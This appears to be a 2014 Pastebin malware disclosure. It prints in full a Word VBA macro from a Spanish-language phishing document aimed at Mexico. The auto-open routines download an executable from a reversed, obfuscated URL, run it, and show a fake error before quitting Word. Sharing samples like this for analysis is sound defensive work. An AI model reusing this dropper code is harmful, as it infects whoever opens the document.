SHARE
TWEET

Untitled

dynamoo Jul 17th, 2014 629 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Malicious macro from Spanish-language Word document targeting users in Mexico
  2. See http://blog.dynamoo.com/2014/07/notificacion-de-transferencia-de-fondos.html
  3.  
  4. -----------8x- CUT HERE --------------------------------
  5.  
  6. Attribute VB_Name = "ThisDocument"
  7. Attribute VB_Base = "1Normal.ThisDocument"
  8. Attribute VB_GlobalNameSpace = False
  9. Attribute VB_Creatable = False
  10. Attribute VB_PredeclaredId = True
  11. Attribute VB_Exposed = True
  12. Attribute VB_TemplateDerived = True
  13. Attribute VB_Customizable = True
  14. Private Sub Auto_Open()
  15. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
  16. End Sub
  17. Private Sub Workbook_Open()
  18. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
  19. End Sub
  20. Private Sub AutoExec()
  21. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
  22. End Sub
  23. Private Sub AutoOpen()
  24. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
  25. End Sub
  26. Private Sub Document_Open()
  27. Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
  28. End Sub
  29. Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
  30.     On Error Resume Next
  31.     Err.Clear
  32.  
  33.     Set XML = CreateObject("Microsoft.XMLHTTP")
  34.     Set ADS = CreateObject("ADODB.Stream")
  35.  
  36.     XML.Open "GET", URL, False
  37.     XML.send
  38.  
  39.     XML.getAllResponseHeaders
  40.  
  41.     FullSavePath = Environ(SavePath) & "\" & SaveName
  42.  
  43.     ADS.Open
  44.     ADS.Type = 1
  45.     ADS.Write XML.responseBody
  46.     ADS.SaveToFile FullSavePath, 2
  47.  
  48.     Shell FullSavePath, vbNormalFocus
  49.     DownloadFile = True
  50.     MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
  51.     Dim z
  52.     z = 0
  53.     Do While 1 = 1
  54.     If z = 2 Then
  55.     Application.DisplayAlerts = False
  56.     Application.Quit
  57.     End If
  58.     z = z + 1
  59.     Loop
  60. End Function
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top